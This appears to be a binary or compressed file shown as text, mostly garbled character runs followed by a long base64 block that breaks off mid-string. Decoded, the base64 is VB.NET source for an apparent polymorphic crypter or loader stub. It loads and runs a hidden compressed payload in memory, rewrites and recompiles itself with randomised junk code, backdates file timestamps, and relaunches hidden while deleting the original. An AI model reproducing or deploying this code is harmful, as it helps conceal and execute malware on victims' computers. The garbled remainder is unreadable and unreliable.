?IxCl\%
#u8.E~w~M
?m_&oTu5s
71wDuo[6
~c}Wd=
?7ba"k
CQJyo?
x}4WA`~)mB_o6G:
Wj|{5~
d?_ @cXm3_~?&
.S5~/aOD_i!FT!+'p|
d[4oPoLD7:~7
~^o_7?
o`77~1
K]~oa
oohMT>
?oc7v7-
S`?p[E{I
3}nv75o>7
8(lzOC#B
0h>6hb7 7
o5"~c7O
~)p/).
K6uz4@Ro|
];0&,o|r
~-3W_K?{GH{
?]E?x~
PpKl?6%Y
B.wIT.a
o7~D]~o}
~7M'w-
%k6?|:
EJwMf`=<
[/M~7L
:il5Em
-~=Z-~_Lml
;[Qd2;[z
ooO8[o
lq6N|i
q~cR3?C<
57]]=}
?&>g?O~k
w$h8-L~=Zouqy
_7Wu}_8|cw
"o8ZL??C
B<~]_~
)S AF?~
(R!q&7h7
sVTG@$2_)uPi
MhcZ[-}k%
HzWe>_gto
b9+b.PF
"M5^]H+
`)]f77u
W?O\Dcz'~Z$2=
|_eEXB
BOXN_c`k|X
cWto;_;_xFX<X
)lC6[D
ghk5kim|N
boydd~
pi"w9;
noE,oUd~
:F,o[:
Z?k Px
9#9< J67?
^k~^97
u17tv!%9
~}oc?^
ua=+~?)O
~~grz~_o
:eC2{O(~oO?W
i5$N1
7>~_0Q
9~_x~(7=_
okoF7
He5JzZG7?iq
Wiz27u?
Fny ]a>Q
9}6]W7
]bAO^FY
!M]}r>HC
_v+~7~1"+O;
_K~SB>
xvv8~}1
700,
c.|3," A
o"zx@m
2Nc"4BQ:]b
I7&C8)[e3N
,f47~r&,*
/K}PXU
[1^Vo*K#e.oI
~)v_xH?_IN
?9[o#h
^8:N?
nV6Y~oTDo _X/3
t%4oHI?'N
(9Ow6o
]d||>]FZ
7S.?d5c[B
~fqS_D
_w!G<_~_]~c|le
fkkbw-
[SX6N`
/ G2N:;IB
_7_7Ovw!?&~.o
~om=oY~
BE?%?M7
iI[|r=
,$_S!r
G?{c5x
Y35~S_
15K~K~
HTiXvdZ
['[o[:VHU
@/XO-Z
"oF9yV
$oEgAX:=Y
E>D>o'~6
+?~_.&[o[
4uJAnEa2]/L
IXi7?=F$7
_[]_k
kN9~_cG
OG"$BP
N.~'0Lo$q
_5_CLocd
c@O5-n*
/")86o;
~?EXt/
JJ_@=I%
;.A6!=F
%RxV%>'o
O`Y|_e7_
AG&NAG
A?H;nt_
d~29U_V?u&#
o*U~_oc
~S3f?wM
95Qjsy_~
_Z&/u\67
0|I!ok.;~
~K[k`>
1A1|[_
zha=c~ukSoY7q
F`w3Ho[f
6'~_!"y&uZ{
_5f"?+7
7aCE<R
.KR/a]7
"u~?hA~K
_iH^(A
Kk_?+D^'1
Zhge5(a1
79`_zB
"sCZ"RazR"snO
'_<>u[z{k>
?THk@W
bO>12k
['x;#"zqn
__~/HQ
]iok"WY]L5y]:%O
joL}F;
F$5@_H
W=HW_8
m"_'oT 
#36A/=y'
u~uOjc
g05___
_cN~?~_
/]~_W.&[xa
_K~w}A+:
3okz_m
W?~W>B
g~G##?M~-~_
x/o_$~>
~ol5?vk
Iok?%I~
';C.>e|k
m~?okY/5
M85Pc_+?^g
kBh'%o
_s?c_/
}|1{?;
c?c3/
cC~3P/
??#?o1=
=~{|~=_75
_o-?#w
57|;[d~
%z_OAk$
aeJ~-w
~_w2&Kk}
e6Y_7]
m~?m#_
_&-Bk_
dJ?v ..zP
7okMqv
/5*&wO~k_IkJ
?_~_H~_w5?
YPoo?'
k5~Lm~<5
<507U/~5
QoKo7_
wG7/~:5Voku
?~_ork=5
qO_OIM~_
?ky2m~o_
.~zkZ_?
{oskcoY?_
}~7;5kk
M_f__7C
oZ_kec
3~?oOZ
okm~VW
6?k___
o~k~_k
/_S.~o~
J:_5~Bz
{P_kk[
{og:uoW:.{
w{uv_S_
?07/h7o
/?65~kw>9_z?zMMo7
]__k?c]=8c
r_Amr
_/_E#W8musw
dokgyH-_!RJ
@+/5_?
~_WW[cRGc'$<
_'6G;?
F~rjGO@?
1__oWZcw
'~B?Yn/.
~_k9/Z_1~H-5_Kf
?kgHOZ
x_g>G~_
O+ok;@l~}~8}~
~oOA[K~?u
IGs-_
vk/dks?
~rH|}o%
{vcF/~_/
M~u7|kW#/
o~a9/3
?r3AF~{T
_H/~?/_F
1{t_u~oI
?.`%wAog
7~H:Wo_~M_I~
v_wok_
oc>o~_w
~?wwugu
ogZk{
K7{1|~
fl"?O_/'=_k?~__
_fw~
?<_~H~?????$
kZfkyok
16_kDcF
co@5~_7
"/!9_?OS>
a{[_M2O_?_~
75_7.O~
0Ou_u_
??co/cn
o&o;}7G
ozQ_F{ooN'c
Yof?A_#v/fofo)J5~_;k;[
_?H75#
i_>O_ G
>o<M^&'kW
?Z_7-~-J%
_kgk!sk_k
5kk<5_
g-~_k_/5A
o}K~~k
C%'?N
[O(!=o
fZe15(uT'fO
_\Ve1
Z_jZyM
yV/evAi0
.7<kT~
_U^gj?oOu
h~Y=+2j=
mNyq$:b
"{k<}z9
}ky}zr_/
7vlSybIs
YUM5P$0
I5/_qs
z3Oj\b(2{c
[Vw :_451K~k45o
zk|WO</zv
:)Tb<+I.
Qq_cb
syg|..~`yt9?ksQ,rf3B
3$&Df~?9~|1
?NO_+z
S^O^w8}z&''
/_w#:~c_
?i~}}S
6IG^d/O=g01Q^
Z'WY*Kc
@Ok<-x-
4+:[6bEm4w:XE5V
NC[1YU
vh~ov>
rsx^]V+4
kaI%a@i^
55t8'qhtR&^
:?7V\h
5b~5Lf?Y_
.X8s_\z]
UqvQ=!
|_W;O=?WO
%;}kLm7o
zk} \ZEu_k
dtZAs{'x
oZA-C_%XeE
Hf@i_aAv
/{D~8~kB*t\
0"hEnX
^FG6.
+E m]]K_c]
l%Q,25_B=
/)_J>c
TR&1!Bc{Z
1S+%t:
:vDn)
%LV9Z$
Ou~E?jy-?~
kbO{:G
4/(/|?h>
Mh&EgO^
Xv>+pf
e^fu~6)I
P|s^,5
G/^g&x6s
S}5V$d%9dV5V
d0y+`B&;;K]hm%we+
&w|;EUV~*l
}z=]}44u~
'F*\,X
75shP@
@I&k>D
v"^-`d7
b?0<X-
QM~Z~aF~
M/^ 'D9
7g/}7g_5~WO
/O_{yzR\
m'|y9T'
$~mZyk
dEtw)R
)5{WO.NY._
ZIE*sZu+=dd
Pn@}[J
nRLPevu
%-WG,2|4
}D$Q_eWF
^~cx~~
IF)OLHz~9}qL/|I"
}kha],
aUk-fJ2
0%:F up\&
ycd!#:$OJX
N5l]~>m*
15"x;c
9cYYO_}S*q</*_
cPf&/[
/ 2C/wq "
$B~C/7
}C%)BJ>En
5~dhX&t^W;\3vAcdiH
LzZQ07
pG%kp78
GXW9dO
}t^4 =FN~F>c
QV8_a
95$;#[/!^;
PYHfuC/g/H89eJ [9I}$a'\j
2[ffIP?
*0f%^!L"NF.D
Z~"F^M
kaon&N
/;\B.dH
W0BF/ne
\I+~LD
%yNVG}KJFK
y&z,jD
!*R *
|_LzSg
~oBqyA/~
X!aEa:Qd}]h
sYaU=BbkF
9^E'O'
fG<~}rv
K-1I/D
w[)Z!-=11/
(OiVm?'4-
&M@_~E~k|E
ej"z_
3Hvs014
%q>[J5)
?Q{]bo$5O)/
J|Yfo*;
&_/k\54\fF
.ivd<^M_I< o
Y#:1$ZjqVI<bLfAI2
F</_?[}/
9bku1O
(+O"qN_8}N/>t6V
$TK Co
^_=%E0s}I
/$py2{
kTFkFk
FF?_ck
5~_o;^
qFO~5h%
bh3k5~X
uAXQAn
w~__S?
{w_R_7|M
_'__76}+c~gx7D?
~@/oxk5M=d
o(%m}i
?elK0?g'[7
mkSmS%S
P3$[k[
A}5~9uJ
wIO'[o
9t6?~4X_h96!F
_?ck>O
X=g?o?~R/
i~_#5GO~
~5~m2VvF?')t
5FO[Od'
k5$W'k!
w4"_7=!o4m
V u1KqL
eAP0!Nt
~[hYHIS
k|zo_g0
="Oonn'ou|3
olKIV>Me
_])3M%q;w5~r9Psb`k
toN"9s?x
a|Na^9~/
tX3^%#s7{
."k|z
H7.mKV8
svJQ(Oh
P]qcj2
CGc;gQ+q
P<>}}jTD
e>!?x1`d
2--nrp
k<|JkJIB^3O]>ZG7o
Y6<fKw9O~{
KbxU}XG|O
EFZA4 [[d&
R>&52io
Fse~8<;]
>~}p7oh3~7[>qC
L+}MC>1W@
P{x{fL?
vz`F*~
~RT%80
DN&]-^X_wD
a^>yZg
Pv6K@p
G>lG4@!+3O
qIYY<)t*
?rtxKp
<$KeB
E}kVx{0
_-d&6GR]
o[(>&p.
w'XOS<%(&#ikx4er>%%
9Kw'H~
kcnY0;5~[pXD
+++oK_
3!?M8sz`
_zow~?
ozoo?~
;kf~_-
~~_-~gwu
c~_u~_/
~|}C7~-~
Nw@7!~7 oo[~_M&
D~/? R
75?J~_7
AX_?7h
vM~_OM~_
#_/oF/Do7M
c|E} k5
G5?c $
oM~;o?
o:N-~7H
7?_xKP
7M~_H~/Vex
E>UMjt
_>k&jU
5}/^H5
$7~_cu
rJOfU5gRD
8d7a!/K
'AM~?M~
Jd&JM
5~?M~_#IO
IB0PDf2
\uM+Ro;
7?qsGu
j%AM[k
!*nBhv
&fM~?
C~]ev0o4
E7k$!.o[k
~;H%kCA^
oNO4W0Z
C5_C>M
"%&2Ygd
-6Oo;N;
I~w~-rO0
_f?kZ7C2
M8ZIBC#e_H'!+
D7H~w"N~
qRE!q$0(
C3_V8o
!>H&!:
M|k+!wM~'2
zF,:Q~_
o~uzQ-OM
hUYYwkg=??_
qv"6~_
ef,Y:e?W~?I17oZ
Ej%lh~
yy\%HS
,<5=[_
x5cvk +8=>
&]g~_7M
nSW1wb3J0cyBTeXN0ZW0uSU8NCkltcG9ydHMgU3lzdGVtLklPLkNvbXByZXNzaW9uDQpJbXBvcnRzIFN5c3RlbQ0KSW1wb3J0cyBTeXN0ZW0uVGV4dA0KSW1wb3J0cyBTeXN0ZW0uRGlhZ25vc3RpY3MNCkltcG9ydHMgU3lzdGVtLkNvZGVEb20uQ29tcGlsZXINCkltcG9ydHMgU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcw0KSW1wb3J0cyBNaWNyb3NvZnQuVmlzdWFsQmFzaWMNCg0KUHVibGljIE1vZHVsZSBEQndoU0ZWeXFUDQoNCidBUEkxDQoNCiAgICBQdWJsaWMgU3ViIE1haW4oQnlWYWwgYXJncygpIEFzIFN0cmluZykNCg0KICAgICAgICBJZiBOb3QgYXJncy5MZW5ndGggPiAwIFRoZW4NCiAgICAgICAgICAgIE5Tc09DcEtvWE4udUVxTEhxa1V3SCgpDQogICAgICAgIEVsc2UNCiAgICAgICAgICAgIFRyeSA6IEZpbGUuRGVsZXRlKGFyZ3MoMCkpIDogQ2F0Y2ggOiBFbmQgVHJ5DQogICAgICAgIEVuZCBJZg0KDQogICAgICAgIERpbSByZXNtIEFzIE5ldyBTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlTWFuYWdlcigiekNvbSIsIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkdldEV4ZWN1dGluZ0Fzc2VtYmx5KQ0KICAgICAgICBEaW0gRGF0YVggQXMgQnl0ZSgpID0gRGVmbGF0ZV9EKHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkxvYWQoRGF0YVgpLkVudHJ5UG9pbnQuSW52b2tlKE5vdGhpbmcsIE5vdGhpbmcpDQoNCiAgICBFbmQgU3ViDQoNCiAgICBQdWJsaWMgRnVuY3Rpb24gRGVmbGF0ZV9EKEJ5VmFsIERhdGFaKCkgQXMgQnl0ZSkgQXMgQnl0ZSgpDQogICAgICAgIFRyeSA6IFJldHVybiBnZXRTdHJlYW1CeXRlc1goTmV3IERlZmxhdGVTdHJlYW0oTmV3IE1lbW9yeVN0cmVhbShEYXRhWiksIENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzLCBUcnVlKSwgRGF0YVouTGVuZ3RoKQ0KICAgICAgICBDYXRjaCA6IFJldHVybiBOb3RoaW5nIDogRW5kIFRyeQ0KICAgIEVuZCBGdW5jdGlvbg0KDQogICAgUHVibGljIEZ1bmN0aW9uIGdldFN0cmVhbUJ5dGVzWChCeVZhbCBkYXRhU3RyIEFzIFN0cmVhbSwgQnlWYWwgZGF0YUNodW5rcyBBcyBJbnRlZ2VyKSBBcyBCeXRlKCkNCiAgICAgICAgRGltIGRhdGEoKSBBcyBCeXRlIDogRGltIHRvdGFsQnl0ZXNSZWFkIEFzIEludDMyID0gMA0KICAgICAgICBUcnkgOiBXaGlsZSBUcnVlDQogICAgICAgICAgICAgICAgUmVEaW0gUHJlc2VydmUgZGF0YSh0b3RhbEJ5dGVzUmVhZCArIGRhdGFDaHVua3MpDQogICAgICAgICAgICAgICAgRGltIGJ5dGVzUmVhZCBBcyBJbnQzMiA9IGRhdGFTdHIuUmVhZChkYXRhLCB0b3RhbEJ5dGVzUmVhZCwgZGF0YUNodW5rcykNCiAgICAgICAgICAgICAgICBJZiBieXRlc1JlYWQgPSAwIFRoZW4gRXhpdCBXaGlsZQ0KICAgICAgICAgICAgICAgIHRvdGFsQnl0ZXNSZWFkICs9IGJ5dGVzUmVhZA0KICAgICAgICAgICAgRW5kIFdoaWxlDQogICAgICAgICAgICBSZURpbSBQcmVzZXJ2ZSBkYXRhKHRvdGFsQnl0ZXNSZWFkIC0gMSkNCiAgICAgICAgICAgIFJldHVybiBkYXRhDQogICAgICAgIENhdGNoIDogUmV0dXJuIE5vdGhpbmcgOiBFbmQgVHJ5DQogICAgRW5kIEZ1bmN0aW9uDQoNCidBUEkyDQoNCkVuZCBNb2R1bGUNCg0KDQpQdWJsaWMgTW9kdWxlIE5Tc09DcEtvWE4NCg0KICAgIFB1YmxpYyBTdWIgdUVxTEhxa1V3SCgpDQogICAgICAgIERlbE1lKCkNCiAgICAgICAgRGltIE15UGF0aCBBcyBTdHJpbmcgPSBQcm9jZXNzLkdldEN1cnJlbnRQcm9jZXNzLk1haW5Nb2R1bGUuRmlsZU5hbWUNCg0KICAgICAgICBEaW0gcmVzbSBBcyBOZXcgU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZU1hbmFnZXIoInpDb20iLCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseS5HZXRFeGVjdXRpbmdBc3NlbWJseSkNCiAgICAgICAgRGltIHNyYyBBcyBTdHJpbmcgPSBGcm9tQmFzZShyZXNtLkdldE9iamVjdCgic3JjIikpDQogICAgICAgIERpbSB6Q29tIEFzIEJ5dGUoKSA9IERlZmxhdGVfRChyZXNtLkdldE9iamVjdCgiZmlsZSIpKQ0KICAgICAgICBVc2luZyB3cml0ZXIgQXMgTmV3IFJlc291cmNlcy5SZXNvdXJjZVdyaXRlcigiekNvbS5yZXNvdXJjZXMiKQ0KICAgICAgICAgICAgd3JpdGVyLkFkZFJlc291cmNlKCJzcmMiLCBUb0Jhc2Uoc3JjKSkNCiAgICAgICAgICAgIHdyaXRlci5BZGRSZXNvdXJjZSgiZmlsZSIsIHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgICAgICB3cml0ZXIuR2VuZXJhdGUoKQ0KICAgICAgICAgICAgd3JpdGVyLkNsb3NlKCkNCiAgICAgICAgRW5kIFVzaW5nDQoNCiAgICAgICAgRGltIHRlbXBuYW1lIEFzIFN0cmluZyA9IFN5c3RlbS5JTy5QYXRoLkdldFRlbXBGaWxlTmFtZSAmICIuZXhlIg0KDQogICAgICAgICAgICAgICAgRGltIFZhcnMgQXMgU3RyaW5nKCkgPSB7Ik5Tc09DcEtvWE4iLCAiYmRwcmNsSHNBSiIsICJEQndoU0ZWeXFUIiwgIlhkSXFYQWhubnYiLCAiRWZ1Zkx0dHpiVyIsICJsS3VNUGp6R2p4IiwgIlBaZ0Vnd1JOQm0iLCAiaW5hZ0dnbXpEUCIsICJ1RXFMSHFrVXdIIn0NCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gVmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZShWYXJzKGkpLCBBKDE1KSkNCiAgICAgICAgTmV4dA0KCQlEaW0gUiBhcyBOZXcgUmFuZG9tDQoJCURpbSBYIEFzIEludGVnZXIgPSBSLk5leHQoMSwgIzEwMCMpDQoJCURpbSBqIEFzIE5ldyBYZElxWEFobm52KDEsIFgpIDogUmFuZG9taXplKCkNCiAgICAgICAgU3JjID0gU3JjLlJlcGxhY2UoU3RyUmV2ZXJzZSgiMUlQQSciKSwgai5FZnVmTHR0emJXKQ0KICAgICAgICBEaW0gajEgQXMgTmV3IFhkSXFYQWhubnYoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIySVBBJyIpLCBqMS5FZnVmTHR0emJXKQ0KICAgICAgICBEaW0gajIgQXMgTmV3IFhkSXFYQWhubnYoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIzSVBBJyIpLCBqMi5FZnVmTHR0emJXKSA6IFJhbmRvbWl6ZSgpDQoJCQ0KCQlTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIjMDAxIyIpLCBYKQ0KDQogICAgICAgIGJkcHJjbEhzQUouaW5hZ0dnbXpEUCh0ZW1wbmFtZSwgc3JjLCBUcnVlKQ0KDQogICAgICAgIERlbE1lKCkNCg0KICAgICAgICBEaW0gRGF0dW0gQXMgTmV3IERhdGUoMjAwMCArIHIuTmV4dCg3LCAxMSksIHIuTmV4dCgxLCAxMCksIHIuTmV4dCgxLCAzMCkpDQogICAgICAgIEZpbGUuU2V0Q3JlYXRpb25UaW1lKHRlbXBuYW1lLCBEYXR1bSkNCiAgICAgICAgRmlsZS5TZXRMYXN0QWNjZXNzVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQogICAgICAgIEZpbGUuU2V0TGFzdFdyaXRlVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQoNCiAgICAgICAgRGltIHN0YXJ0SW5mbyBBcyBOZXcgUHJvY2Vzc1N0YXJ0SW5mbw0KICAgICAgICBzdGFydEluZm8uV2luZG93U3R5bGUgPSBQcm9jZXNzV2luZG93U3R5bGUuSGlkZGVuDQogICAgICAgIHN0YXJ0SW5mby5GaWxlTmFtZSA9IHRlbXBuYW1lDQogICAgICAgIHN0YXJ0SW5mby5Bcmd1bWVudHMgPSBNeVBhdGgNCiAgICAgICAgUHJvY2Vzcy5TdGFydChzdGFydEluZm8pDQogICAgICAgIFByb2Nlc3MuR2V0Q3VycmVudFByb2Nlc3MuS2lsbCgpDQoNCg0KICAgIEVuZCBTdWINCg0KCSdBUEkzDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBBKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFuZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gInF3ZXJ0eXVpb3Bhc2RmZ2hqa2x6eGN2Ym5tUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk0iLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQogICAgUHVibGljIEZ1bmN0aW9uIEFCKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFuZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gIjEyMzQ1Njc4OTAiLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQoNCiAgICBGdW5jdGlvbiBUb0Jhc2UoQnlWYWwgU3RyIEFzIFN0cmluZykgQXMgU3RyaW5nDQogICAgICAgIFJldHVybiBDb252ZXJ0LlRvQmFzZTY0U3RyaW5nKEVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoU3RyKSkNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBGdW5jdGlvbiBGcm9tQmFzZShCeVZhbCBTdHIgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgUmV0dXJuIEVuY29kaW5nLkRlZmF1bHQuR2V0U3RyaW5nKENvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhTdHIpKQ0KICAgIEVuZCBGdW5jdGlvbg0KDQoNCiAgICBTdWIgRGVsTWUoKQ0KICAgICAgICBUcnkgOiBJTy5GaWxlLkRlbGV0ZSgiekNvbS5yZXNvdXJjZXMiKSA6IENhdGNoIDogRW5kIFRyeQ0KICAgIEVuZCBTdWINCg0KRW5kIE1vZHVsZQ0KDQpQdWJsaWMgQ2xhc3MgYmRwcmNsSHNBSg0KDQogICAgUHVibGljIFNoYXJlZCBTdWIgaW5hZ0dnbXpEUChCeVZhbCBPdXRwdXQgQXMgU3RyaW5nLCBCeVZhbCBTb3VyY2UgQXMgU3RyaW5nLCBCeVZhbCByZXMgQXMgQm9vbGVhbikNCiAgICAgICAgT24gRXJyb3IgUmVzdW1lIE5leHQNCg0KICAgICAgICBEaW0gQ29tcGlsZXIgQXMgSUNvZGVDb21waWxlciA9IChOZXcgVkJDb2RlUHJvdmlkZXIpLkNyZWF0ZUNvbXBpbGVyKCkNCiAgICAgICAgRGltIFBhcmFtZXRlcnMgQXMgTmV3IENvbXBpbGVyUGFyYW1ldGVycygpDQogICAgICAgIERpbSBjUmVzdWx0cyBBcyBDb21waWxlclJlc3VsdHMNCg0KICAgICAgICBQYXJhbWV0ZXJzLkdlbmVyYXRlRXhlY3V0YWJsZSA9IFRydWUNCiAgICAgICAgUGFyYW1ldGVycy5PdXRwdXRBc3NlbWJseSA9IE91dHB1dA0KDQoNCiAgICAgICAgUGFyYW1ldGVycy5SZWZlcmVuY2VkQXNzZW1ibGllcy5BZGQoIlN5c3RlbS5kbGwiKQ0KICAgICAgICBQYXJhbWV0ZXJzLlJlZmVyZW5jZWRBc3NlbWJsaWVzLkFkZCgiU3lzdGVtLkRhdGEuZGxsIikNCg0KICAgICAgICBJZiByZXMgPSBUcnVlIFRoZW4NCiAgICAgICAgICAgIFBhcmFtZXRlcnMuRW1iZWRkZWRSZXNvdXJjZXMuQWRkKCJ6Q29tLnJlc291cmNlcyIpDQogICAgICAgIEVuZCBJZg0KICAgICAgICBQYXJhbWV0ZXJzLkNvbXBpbGVyT3B0aW9ucyA9ICIvZmlsZWFsaWduOjB4MDAwMDAyMDAgL29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1Zy0gL3RhcmdldDp3aW5leGUiDQoNCiAgICAgICAgY1Jlc3VsdHMgPSBDb21waWxlci5Db21waWxlQXNzZW1ibHlGcm9tU291cmNlKFBhcmFtZXRlcnMsIFNvdXJjZSkNCg0KCQkNCg0KICAgIEVuZCBTdWINCkVuZCBDbGFzcw0KDQpQdWJsaWMgQ2xhc3MgWGRJcVhBaG5udg0KDQogICAgUHJpdmF0ZSBUaXAgQXMgSW50ZWdlcg0KICAgIFByaXZhdGUgS29saWtvIEFzIEludGVnZXINCg0KICAgIFN1YiBOZXcoQnlWYWwgVHlwZSBBcyBJbnRlZ2VyLCBCeVZhbCBLb2xpa294IEFzIEludGVnZXIpDQogICAgICAgIFRpcCA9IFR5cGUNCiAgICAgICAgS29saWtvID0gS29saWtveA0KICAgIEVuZCBTdWINCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBFZnVmTHR0emJXKCkgQXMgU3RyaW5nDQogICAgICAgIERpbSBob2xkZXIgQXMgU3RyaW5nID0gU3RyaW5nLkVtcHR5DQogICAgICAgIEZvciBpIEFzIEludGVnZXIgPSAwIFRvIEtvbGlrbw0KICAgICAgICAgICAgSWYgVGlwID0gMSBUaGVuDQogICAgICAgICAgICAgICAgaG9sZGVyID0gaG9sZGVyICYgUFpnRWd3Uk5CbShpKSAmIHZiTmV3TGluZQ0KICAgICAgICAgICAgRWxzZQ0KICAgICAgICAgICAgICAgIGhvbGRlciA9IGhvbGRlciAmIGxLdU1QanpHangoaSkgJiB2Yk5ld0xpbmUNCiAgICAgICAgICAgIEVuZCBJZg0KICAgICAgICBOZXh0DQogICAgICAgIFJldHVybiBob2xkZXINCiAgICBFbmQgRnVuY3Rpb24NCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBsS3VNUGp6R2p4KEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICBQdWJsaWMgU3ViIHZhcjEiICYgbmFtZSAmICIoQnlWYWwgdmFyMiBBcyBTdHJpbmcsIEJ5VmFsIHZhcjMgQXMgU3RyaW5nLCBCeVZhbCB2YXI0IEFzIFN0cmluZykiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeGl0IFN1YiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBTdWIiKQ0KICAgICAgICBEaW0gc3JjIEFzIFN0cmluZyA9IEZ1bmsuVG9TdHJpbmcNCiAgICAgICAgRGltIHZhcnMoKSBBcyBTdHJpbmcgPSB7InZhcjEiLCAidmFyMiIsICJ2YXIzIiwgInZhcjQiLCAidmFyNSIsICJ2YXI2In0NCiAgICAgICAgUmFuZG9taXplKCkNCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gdmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZSh2YXJzKGkpLCBBKDUpICYgbmFtZSkNCiAgICAgICAgTmV4dA0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBSZXR1cm4gc3JjDQogICAgRW5kIEZ1bmN0aW9uDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBQWmdFZ3dSTkJtKEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJO